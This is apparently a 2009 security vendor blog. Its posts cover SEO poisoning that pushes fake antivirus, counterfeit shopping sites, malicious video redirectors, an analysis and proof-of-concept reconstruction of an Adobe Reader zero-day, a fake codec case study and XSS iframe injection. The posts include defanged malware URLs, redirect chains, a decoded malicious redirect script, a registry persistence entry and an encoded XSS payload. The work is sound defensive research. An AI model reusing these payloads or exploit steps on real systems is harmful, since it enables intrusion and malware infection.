Tuesday, December 22, 2009

Malware attacks on Winter Solstice - Shortest day of the year 2009

Yesterday, December 21st 2009 was the Winter Solstice, meaning that it was the shortest day of the year. Malware authors did not miss this opportunity to push their malicious binaries using SEO (search-engine optimization) attacks. My colleague already posted a blog on SEO attacks where he mentioned that an SEO attack takes the advantage of Google's PageRank Technology to push search results to the top. We found several phrases/names like “Winter Solstice 2009 celebration” or “Shortest day of the year 2009” used in the search query resulted in a page redirecting to malicious sites containing malware. Here is the screenshot of search result,


Looking at the screenshot, you will find that the 3rd and 5th search results are malicious. Attackers use SEO as users are more likely to click on links which show up as top results. Clicking on the 3rd link uses redirection to direct victim to a malicious site hosting malware. Here is what a user will see,


Redirection could take the victim to a variety of sites, all of which are hosting fake security applications. The malicious sites are using fake images, popups or even showing videos to social engineer the victim into downloading a malicious executable once they click on the page. Here are some few sites used for downloading the malware:

“hxxp://ftorm.com/scn/579876515334ef7a1587…[truncated]”

“hxxp://shjow.com/scn/3fe14f17847082bd940b…[truncated]”

“hxxp://prizepcscan.com/?p=p52dcWpsal%2FCj…[truncated]”

“hxxp://newscanonline.info/downloads.php/?aff_id=384…[truncated]”

Here are screenshots of the malicious sites:


The above images are taken after clicking on the same search results multiple times, resulting in redirection to different attack sites and methods used for infection. Sometimes the victim will be presented with a video playing or popup images or messages urging the victim to install fake anti-virus software. The sites displaying videos will download a file named “Flash_Plugin_Setup1261476530.exe” to the system and other sites download “setup.exe” as a malicious file. Here are the virus total results for those files,

For “Flash_Plugin_Setup1261476530.exe”

http://www.virustotal.com/analisis/78f7246e0e6b9ae58bba1581727f2f598d330cfaf34c987f1bed665ee53429cb-1261476806

For “setup.exe”

http://www.virustotal.com/analisis/2f86f7bc9139dc4267ad1325c92f08557f5a359e6d74ccb6620248b99cf9a68e-1261476933

The “setup.exe” has very poor detection (4 out of 41). This is not the first time malware authors have used the latest hot news, celebrity’s names, holidays, popular event etc. They use such key phrases to push their malicious site to the top of the search results using SEO techniques. They continually change their malicious binaries in order to evade Anti-viruses from detection. The success of this approach is demonstrated in the above Virustotal results illustrating poor AV detection. Be sure to never download anything from redirected site promising free security software.

Be Safe,

Umesh

Monday, December 21, 2009

Beware of SEO attacks

On Sunday, Tom Stuker, a United Global Services member that flew about 700,000 miles this year, was interviewed on Fox News. Not long after that, the top Google search results for Tom Stuker were all poisoned to have links that take the victim to Fake AV malware downloads.

SEO (search-engine optimization) attacks, take advantage of Google's PageRank Technology to have their page result bubble to the top. Google's PageRank Technology is based on a web of trust, they rank pages that are linked to as being of higher importance and thus scored higher. However, using clever hypertext content for their page and an army of bots to spread links on forums, blogs, hacked websites, etc. hackers are able to grab the top spots for their search terms of choice.

Given the speed at which these search terms are poisoned, it is likely that the hackers may have bots monitoring popular media feeds for names / key-phrases that folks are likely to Google. This type of leveraging of the media as a decision-based feed for automation reminds me of the fictional book Daemon. Other members in the security industry have taken recent notice to these rapid SEO attacks as well: Brittany Murphy SEO and Beware of bad Google search results.

Following the redirects to get to the malware for one of the Tom Stuker examples seen yesterday:

hxxp://davtech.org/sqr.php?in=tom%20stuker
302s to: hxxp://hirm9k.xorg.pl?in.php?t=cc&d=20-12-2009_some2&h=davtech.org&p=http%3A%2F%www.google.com [snip...]
302s to: hxxp://newvirusscan.com/hitin.php?land=20&affid=92400
302s to: hxxp://newvirusscan.com/index.php?affid=92400

few js's load then the payload:
hxxp://newvirusscan.com/downloader.php?affid=92400
200 response: Content-Disposition: attachment; filename="install.exe"

Interesting stuff in the 200 OK response from the server:
Pragma: hack

Uploaded sample to VirusTotal (first one seen for this sample) - poor detection (13/41): http://www.virustotal.com/analisis/af58ed98fdc57ed25eb59d7e21b28f9f270bae6a5a8ca789f97876641567800f-1261348933



Saturday, December 19, 2009

Going Green? The Cloud can help...

In light of the U.N. Climate Conference in Copenhagen, Denmark this week, and the agreement "to set a mitigation target to limit warming to no more than 2 degrees Celsius" I thought it would be fitting to do a quick post on the energy-saving benefits of cloud computing ... whether you are doing it to save the polar bears or to save some cash, these benefits should be recognized and considered by many organizations.

Do a Google search for cloud computing energy saving and you get about 195,000 results. This does not come as a surprise, because as one of the results states, cloud computing is "an inherently energy-efficient technology." No shock here: the amount of computing power that most organizations have is well beyond what is actually being used by their employees ... and as Moore's Law indicates, this computing power will double every two years. Many of the servers in your organization's server racks are not doing anything terribly complex: handling DNS lookups, processing email, filtering traffic, and storing data. Most organizations have a separate server for each function and may have redundant / fail-over servers as well.

This website calculates the electricity cost of running a desktop computer to be $405/year (330 Watt power supply and $0.14/kWh). A Dell PowerEdge 2970 has a 750 Watt power supply with an option for a redundant power supply for fail-over. Running this server has an electricity cost of $907/year per power supply. HowStuffWorks details how much electricity coal generates (roughly 2,460 kWh/ton). Running the example server with one power supply for a year uses 6,480 kWh, requiring 2.6 tons of coal.

Cloud computing companies often lease space in data-centers, which charge a premium for power, cooling, and rack-space (see Datacenter energy costs outpacing hardware prices). In order for companies that offer services in the cloud to remain competitive, they must be efficient with their computing power: consolidation, virtualization, efficient software, "smart" power management, etc. So adopting cloud computing is a good thing: it saves electricity/money/coal/pollution/polar bears/planet and funds the innovation of efficient computing.

Friday, December 18, 2009

1 Week 'til XMAS... Avoid Shopping Woes

Many folks are familiar with fake goods sites (e.g., replica watches and fake pharm / pill sites). These sites either peddle shoddy goods, or just flat out steal your payment credentials.

In case you needed to be reminded this holiday season, there are more than the obvious scam sites out there. Many show up in search engine results / advertisements and forum / e-mail advertisements (spam). On top of which, many have been in business for more than this holiday season.

Some examples,
hxxp://www.cheap-abercrombie.com/
hxxp://www.variantkicks.com/
hxxp://www.tiffanyoutlet.com/

You can see by visiting the sites, that their virtual store-fronts look legit:


The Name Records for each of these examples dates back to 2001, 2007, and 2008:

There are many more examples of these questionable virtual storefronts. However, I was able to find a single forum post spam advertising the above examples (which I why I selected these three):

This site states that cheap-abercrombie.com advertises that their merchandise is authentic, but customers are reporting the merchandise to be poorly made replicas with no option for return / refund.

This site states that variantkicks.com sells counterfeit shoes and charges $36 USD for returns.

The tiffanyoutlet.com site does not currently resolve an A record (but is also not showing that it is suspended by the Registrar). Google has a cached page of the site here, and Google results show that the site has been advertised via spam and is peddling fake jewelry.

Whether you are buying your sweetie a tennis bracelet, a sweater, or some new kicks this holiday season, buy from reputable stores, do your research, and if you have any doubt about the legitimacy of a store, err on the side of caution and shop elsewhere. Onguardonline.gov has more advice for online shopping here.

Don't watch-familyguyonline.com

... or at least be careful if you do.
Who doesn't like a good episode of Family Guy? Well even if you don't, that isn't the point of this post. There are dangers visiting and trusting sites that link to and embed content into their site without validating the content first. Malware advertisers have been leveraging pop culture content and stories to entice and social engineer their victims into downloading their malware - Michael Jackson's death themed malware is a prime example. This morning I came across some malicious redirector sites that look very much like (and may be) legit sites. None-the-less, when a visitor follows the embedded video link to view their favorite episodes of Family Guy or another show, they would receive an annoying dose of survey pages (i.e., sign me up for spam) and/or malware.

Here's a snippet of such sites for Family Guy:
watch-familyguyonline.com
www.watch-family-guy-online.com
www.watch-familyguy-online.com
watchfamilyguyonline.org

What appears to have happened here is that sites like these automatically embed links to megavideo.com or other external video sources that are tagged as being Family Guy (or other specific) episodes without validating them.

Following the redirects, I tracked these two examples to the following malware:
hxxp://watch-familyguyonline.com/testt/
hxxp://www.watch-family-guy-online.com/season-8/episode-9-business-guy/

The loaded megavideo.com content, eventually taking the path:
  1. Megaclick.com, e.g., hxxp://s.megaclick.com/ad.code?de=9e09c529-07435895-c974b103-73e05fb5-bd3a-4-a48c&tm=1261149695.21963&du=aHR0cDovL3d3dy55ZXpsaW5rLmNvbS9zdGF0cy5waHA%2fcD1tZWdhY2xpY2tnenVz%0a&api_var_rd_mode=popunder_html
  2. Yezlink.com, e.g., hxxp://www.yezlink.com/stats.php?p=megaclickgzus
  3. 302 redirect to hxxp://www.gameztar.com/go.php?a=1839&l=112
  4. 302 redirect to hxxp://www.gameztar.com/startDownload.do?a=1839&l=112
  5. Download: hxxp://download.gameztar.com/toolbar/gameztar/download/avatar/2.1.102.r6380/000011_oSz/gameztar_installer.exe

The MD5 of the sample is: c5b8e34abfb067ddc5f294cb057f86a0
With VirusTotal results (9/41): http://www.virustotal.com/analisis/a4b092a2b60a07aa6127314e5fbf37642272ad725569ed008df108fe43fd524b-1261147802

Update:
While writing this post, it appears that the first video has already been removed by megavideo (for infringement violation).


Wednesday, December 16, 2009

New Zero day Adobe Acrobat Reader vulnerability analysis – Part 2

Earlier, in the first blog of this series we talked about a malicious PDF file and extracted the malicious script. Now, we have a malicious script in readable format and want to know if this successfully runs or not. I am not going to run the original malicious file for now. I will replace the original shellcode with a simple one which will open a “calc.exe” after successful exploitation. The problem is the original malicious PDF file is in encoded format so we can’t edit the malicious script inside the file. For that I will create a new test PDF file using “make-pdf-javascript.py” tool from PDF Tools. This tool will create a simple PDF file containing JavaScript which will display a message box once opened. I am going to add malicious JavaScript code inside this file using command,

D:\make-pdf-javascript.py --javascriptfile=Malicious_Script.js test.pdf

I am going to use another shellcode which will open “calc.exe”. Here is the newly created PDF file:

Let’s open it and see if this exploit works. This time it only crashed and did not opened a “calc.exe”. But I got a chance to look into the debugger. Here is the state of the ollydbg debugger,

The EDX currently points to zero and it is trying to CALL DWORD from [EDX +4]. Since it is zero, it has an access violation exception. Further we found that the module is “C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api”. Let’s change some EDX values manually in the debugger to see if this is going to work or not? Since we have already filled a heap we need to change values accordingly. I found our NOP sled and shellcode gets loaded at “0A0A0A0A” address, so this is the value we are going to use. Here is the state of ollydbg once I modify the values,

Now, EDX points to “0x0A0A0A0A” address and [EDX + 4] contains address “0x0A0A0A20” which is our NOP sled. So once I press “F9” (run) button in Ollydbg, it will jump to “0A0A0A20” address and will execute everything from there on. You can see this step by step during debugging. Yes, it has executed the NOP sled and our shellcode and “calc.exe” opened on the machine. But this was done by changing the values manually. It looks like there is problem with memory corruption. I played a little bit with the code and found that we have to add one more line of the vulnerable function before try{} block. Here is how new modified code will look,

Once I run this file again, the shellcode executed successfully and it showed a classic POP up box with error message and opened “calc.exe”,

From above, it is clear that there is memory free issue with the vulnerable method “util.printd()”. It required calling this method twice with the try {} block. The code gets executed successfully and opened a calculator. This means if we now remove the “calc.exe” shellcode and use the original shellcode, then it is going to execute in the background without any notice. I am not going into more details of the original shellcode this time due to length of the blog post.

That is it for this series.

Umesh

New Zero day Adobe Acrobat Reader vulnerability analysis – Part 1

On December 14th, Symantec and Shadowserver reported a new zero day vulnerability in the wild affecting Adobe reader. This is now identified as CVE-2009-4324. Adobe acknowledged the same on their website saying they are investigating this issue. And as usual, it is not the first time that PDF’s are being targeted for exploitation. Earlier we saw that Flash files are being targeted, taking advantage of known vulnerability in the wild. This time it is an Adobe zero day vulnerability being exploited in the wild. A colleague provided me with a sample PDF file exploiting this vulnerability in the wild. I started looking into it in depth. The PDF file was obfuscated and not in the readable format. I used my favorite “pdf-parser.py” from PDF Tools. I ran the malicious PDF file through this parser and took the output of every element of PDF file in a text file. Here is how it looks:

The output file was very big and I wanted to the malicious script code inside it. As I said earlier, the file was obfuscated and contains a lot of objects/elements inside. I was only interested in the some strings like JavaScript, FlateDecode, etc. I tried to search for these blocks inside the output file and I found some of interest:

The above screenshots show some of the interesting blocks and which were used to uncover the malicious code inside. The “pdf-parser.py” tool has some very good options to parse the certain objects inside the file. I looked at the documentation of the tool and some of the options looked valuable to me. Here are some options and documentation directly copied from PDF Tools site.

“Filter option applies the filter(s) to the stream. For the moment, only FlateDecode is supported (e.g. zlib decompression). The raw option makes pdf-parser output raw data (e.g. not the printable Python representation). Objects outputs the data of the indirect object which ID was specified. This ID is not version dependent. If more than one object have the same ID (disregarding the version), all these objects will be outputted.”

This is what we need for running against suspicious blocks or objects inside PDF file. I then ran a command against this object tag ID 110 using command like,

D:\ >pdf-parser.py --object=110 --raw –filter malicious-file.pdf > output.log

The command run successfully and I was interested to see if we get any interesting data in the output file. I opened the file and found very suspicious and obfuscated JavaScript code:

Now, from this it was easy to work. I opened Malzilla (malware hunting) tool and copied above script into decoder section of the tool. I ran the ‘Run Script’ button and found another script but it was in readable format. Here how it looked:

Let’s copy this and put it in a text file so that we can able to see whole script. This is a screenshot of full script used in the PDF file,

If you look at the strings and code above, it is clearly a heap spray code and this code relates to adobe reader. It is checking the version of application and if the application viewer version is greater than 8 then only it will exploit the vulnerability. This identifies that it is targeting latest Adobe reader. There is also one JavaScript function called “util.printd()”, one try{}-catch{} block and this looks the culprit. This function returns a date using a specified format according to documentation on Adobe. If you look at the parameters passed to this function, it is invalid and contains @ and some long numbers. This is likely the vulnerable method causing memory corruption in Adobe reader.

This is the first blog on the series and I will provide more information in the second blog of this series. The second blog will cover if the exploit is successful or not and how it can be leveraged further. I mentioned earlier in the Flash blog series as well that new zero day vulnerabilities continue to be discovered in the wild affecting popular applications like Adobe. The solution to this will be to disable JavaScript withing Acrobat Reader, described by the Shadowserver team, as Adobe does not have patch yet.

That’s it for now. Happy hunting!!!

Umesh

Tuesday, December 15, 2009

2010 Security Predictions

2009 was the year that we learned the meaning of the word recession and looked to the cloud for answers. Budgets were slashed and security departments were forced to do more with less, all while cybercrime rates rose as frustrated individuals used whatever means necessary to earn in a difficult economic climate. What 2010 will bring remains unclear but as we approach the New Year, optimism is beginning to emerge.

On the technology front, the ‘cloud honeymoon’ is over and now the hard work begins. Mobile is as exciting as ever with new platforms and functionality emerging with vendors battling for dominance. Social networking winners have been established, but we’re just beginning to see their true potential. Much remains to be seen but one thing is for sure – attackers are following these trends just as closely as the enterprises and consumers that benefit from them. That which becomes popular today, will be the attack vector of choice tomorrow. Below are our security predictions for the New Year.

1.) Apple is forced to climb the security learning curve

Apple has for some time been considered to have a safer operating system in OS X as it is less often targeted by attackers. While that may be true, it is less secure overall and Apple's increasing market share will force them to finally invest in security due to increasing attacks targeted at Apple devices.

2.) App Store Party Crashers

App stores are all the rage, with every mobile vendor racing to replicate Apple's success. Generally, vendors stand guard and only let in the applications that they feel are appropriate. Consumers mistakenly believe that this ensures that only secure applications can be obtained but that is not the case. Security testing is limited at best with app developers already having success slipping in apps with undocumented APIs. Attackers will take things one step further and slip malicious apps in under the gatekeeper's watch.

3.) Web based worms go prime time

We've been teased with a variety of web based worms from Samy to StalkDaily. Most have been experiments as opposed to planned attacks with the goal of financial gain. That's about to change.

4.) The emergence of the web platform

We've gone from web sites to web applications and we're now seeing the birth of the web platform. Social Networking sites such as Facebook have gone beyond delivering dynamic applications welcoming user-supplied content. They have now evolved into platforms inviting user-supplied functionality, allowing virtually anyone to develop unique applications within their ecosystem. Attacker will take advantage of this to deploy malicious applications on social networks and the sites will struggle to identify and block them before deployment.

5.) Attackers turn to the cloud

The cloud offers unprecedented storage and processing power at an attractive price. Think that's only attractive to enterprises? Think again.

6.) The arrival of financial DDoS attacks

Cloud based services generally charge based on actual consumption. This provides attackers with incentive to hold enterprises hostage by artificially inflating costs. Unfortunately, cloud providers have little incentive to stop this practice.

7.) Poking holes in the cloud

My greatest hope for 2010 is that marketing departments will give the term 'cloud computing' a well-deserved break. 2009 saw great interest in the development of cloud computing architectures and one must wonder how often security was sacrificed in order to get to market quickly. Expect attackers to devote time to poking holes in the APIs of cloud providers. When they're found, thanks to multi-tenant architectures, it will have been worth the effort.

8.) Clickjacking comes out of hibernation

Clickjacking roared onto the scene in the summer of 2008 when Jeremiah Grossman and Robert Hansen had their OWASP talk delayed at the request of Adobe. The sensational web cam/microphone hack that drew media attention has been addressed, but the overall flaw still remains. Clckjacking can be a valuable tool in a social engineering attack and we’ve just begun to see it leveraged in attacks.

9.) Browser vendors finally start to take XSS seriously

I was very encouraged when Microsoft released IE 8 this year and it included cross-site scripting (XSS) protection. For all of the heat that Microsoft takes for security vulnerabilities, they continue to be a leader when it comes to adding innovative security features and this was another example. I’m confident that other browser vendors have taken notice and will fall in line.

10.) Past Data Breaches will look like child's play

This is by far the easiest prediction to make. We’ve all been amazed by the staggering numbers of compromised accounts in the CardSystems, Heartland and TJX data breaches, but prepare to be blown away once again. After all, records were made to be broken. As memory becomes cheaper and power becomes more expensive, enterprises are looking to consolidate data storage and continue to build massive data centers and develop ever larger data stores thanks to cloud computing. The volume of data that can be stolen when adequate security controls are not implemented will be truly staggering.

Monday, December 14, 2009

Case Study: Fake Codec Leveraging LastFM


The Fake Codec / Fake Anti-Virus malware campaign, historically led by the Russian Business Network (RBN), has been going on for some time (here's a blog post dating back to 2006). Dancho Danchev's blog often details this campaign as well. While the campaign hasn't changed that drastically from its inception, I thought I'd provide an overview of a case seen this morning to highlight its current state.

This morning's case used a LastFM user profile to advertise a Britney Spears sex tape:
hxxp://www.last.fm/user/BritneySpears33

LastFM is not the only victim of having malware campaigns advertised through their social networking interface (other examples where Fake Codec / AV malware has been advertised include other popular social sites: LinkedIn, Hi5, Digg, Scribd, and yes Facebook).

Here are a few more examples of these advertisements seen in LastFM (be careful if you follow these links): example 1, example 2, and example 3.

The Shoutbox portion provides a link to kick-off the "fun-filled" viewing for the unsuspecting victim ...

The link directs the would-be victim to: hxxp://bigtubeforyou.com/mirolim-video/5.html
which presents the browser with the obfuscated Javascript:

which decodes to:
var1=71;var2=var1;
if(var1==var2) document.location="hxxp://evamendesochka.com/go.php?sid=<num>";

The "sid" parameter allows the client to cycle through a round-robin of 302 redirects to Fake Code / AV malware sites including:

hxxp://showmelovetube.cn/tube.htm
hxxp://door-ringer.cn/?pid=116&sid=299a9c
hxxp://tinytubetv.com/xplaymovie.php?id=45233

With malware downloads to:

hxxp://tubefreewatch.cn/1/install_plugin.exe
hxxp://windows-antivirus2.com/download/Inst_116.exe
hxxp://clearcristalmedia.com/flash-HQ-plugin.45233.exe

Some of the A records for the above used domains:
bigtubeforyou.com. 3600 IN A 66.36.248.253
evamendesochka.com. 2123 IN A 66.36.231.29
showmelovetube.cn. 2145 IN A 66.36.248.253
tubefreewatch.cn. 3600 IN A 66.36.248.253

NS records for the above used domains include:
ns1.kimmusha.com. 172513 IN A 66.36.231.29
ns1.evamendesochka.com. 172800 IN A 66.36.231.29

Taking a look at the 66.36.0.0/19 rwhois for this hopone.net block shows that the two IP addresses used in this campaign are specifically swipt out for the "
sls-db4p12" network name, "svservers" organization:


The sls-db4p12 network name identifies the IPs as being part of superb.net network. The organization, svservers has been identified (again, dating back to 2006) in the past involved in supporting spamming / hacking operations. SvServers is a Russian dedicated hosting service:


These redirect / malware domains will be updated by the malware provider as they are discovered and blocked (e.g., by Google / browser alerts). One out of the above three was in my browser's alerts at the time of writing this up. Fortunately for reputation-based schemes, such as Zscaler's Page Risk Indexing, these IPs and certainly the SvServers infrastructure will be in use a bit longer by the malware provider.

The malware samples have very poor detection:

Inst_116.exe
MD5: c0d2017be29e5383b1a680ef59ed22e0
VirusTotal (5/41): http://www.virustotal.com/analisis/d1a052f117f1e0e4f828c04b7cabd8428cde6b9fc11f61e6e2f3d63ec01f9152-1260842320

flash-HQ-plugin.45233.exe
MD5: 2d683959e8864707f8f9808c404cd315
VirusTotal (8/41): http://www.virustotal.com/analisis/439d13cdefff86ed15051920114d10d2b190d08c1620245b15c6e56f1c8958e1-1260844620

and the most interesting for last:

install_plugin.exe
MD5: cbc1760ac498065235fea17f35eb254b
VirusTotal (0/41): http://www.virustotal.com/analisis/387b9195ab821bdc32c8e2523e1137de67305100b992df0d4393198adae292ae-1260817839

F-Prot identified the binary as being packed by NSIS. NSIS is the Nullsoft Scriptable Install System, which states the following capabilities:

The latest release was recent: NSIS 2.46 on December 6, 2009.

7-Zip advertises on their homepage to be able to unpack NSIS. Running the file through 7-Zip, the following file was extracted the from the NSIS file:
cryptwm97.dll
MD5: 2a823c8d471c5b7ee394e8bd2d0087f4
VirusTotal (0/41): http://www.virustotal.com/analisis/327939a7910aa4747302c66ba6f4b6f8eea8cd08a4e3065682a711149c3f318e-1260820248

The DLL is 73728 bytes and imports and leverages functionality from the Windows DLLs:
gdi32.dll, kernel32.dll, ole32.dll, shell32.dll, shlwapi.dll, user32.dll

And exports the functions:
DllInit and DllInstall

Running the install_plugin.exe through a sandbox, a file with the same MD5 as cryptwm97.dll was created on the infected system at the location:

%AppData%\atmsyssound\atmsyssound.dll

Where, %AppData% is a variable that refers to the file system directory that serves as a common repository for application-specific data. A typical path is C:\Documents and Settings\[UserName]\Application Data.

The malware also modified the registry key:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
with value
atmsyssound = "rundll32.exe "%AppData%\atmsyssound\atmsyssound.dll", DllInit"
so that atmsyssound.dll runs its initialization function DllInit every time Windows starts.

No network traffic was observed after infection. There is an identifiable string in the binary, (beyond the function calls from imported Windows DLLs): dvyllawnx.dll. Googling for atmsyssound.dll, cryptwm97.dll, and dvyllawnx.dll revealed no results. While the exact functionality of the binary is currently unknown, odds are that it is an information stealer of some kind or backdoor similar to Zlob (which has been the typical payload of these Fake Codec attacks). I plan to conduct further analysis on the payload and will share in a future blog post if it is interesting.

Some lessons from this:
  • Social network sites allow users (including malicious users) to post / advertise content (including malicious content).
  • While browser alerts and anti-virus products are good tools, they are not very effective by themselves.
  • The Fake Codec / AV campaign is still alive and well after all these years, and these and other malware campaigns will continue to adapt to social networking advertisements and difficult to detect / analyze payloads.

XSS Embedded iFrames

Today we saw a variety of pages being advertised that have search.htm and other pages vulnerable to cross-site scripting (XSS) being used to inject an iframe to a malicious webpage redirector. To an unknowing user following such an advertisement, they would believe that they were just visiting the intended host site unaware that the iframe was also redirecting them to malicious content.

Here are a few examples with some of the malicious XSS advertisements (do not follow these or other "hxxp" URLs below):


In each of the above examples, the parameter passed to the server's .htm or .php file is a string that includes encoded HTML. When the server processes the parameter, it displays the original parameter (users usually want to see their query string) and its results. Because the original parameter is displayed on the page without any sanitization for this type of encoded HTML, it is possible for this XSS to take place. The encoded HTML in each case is hexadecimal encoded HTML:

%3C%2F%74%69%74%6C%65%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%2F%2F%61%73%6B%35%2E%65%75%3E

which decodes to a closing </title> tag for the query string, followed by the malicious iframe to embed:

<iframe src="//ask5.eu">

ask5.eu does a Javascript redirect using parent.location.replace() to:
hxxp://alanhui.co.cc

which does a Javascript parent.location.replace() to:
hxxp://max-well2.cn/?pid=349s01&sid=dd93d9

which lands the user at:
hxxp://windows-antivirus4.com/scan1/?pid=349s1&engine=%3DHW39TjuMDQxLjYyLjEyMyZ0aW1lPTEyNjI4NUEOOAkO

and downloads:
hxxp://windows-antivirus4.com/download/Inst_349s1.exe



Fake AV malware sample:
MD5: c0d2017be29e5383b1a680ef59ed22e0
Virus Total (6/41): http://www.virustotal.com/analisis/d1a052f117f1e0e4f828c04b7cabd8428cde6b9fc11f61e6e2f3d63ec01f9152-1260851264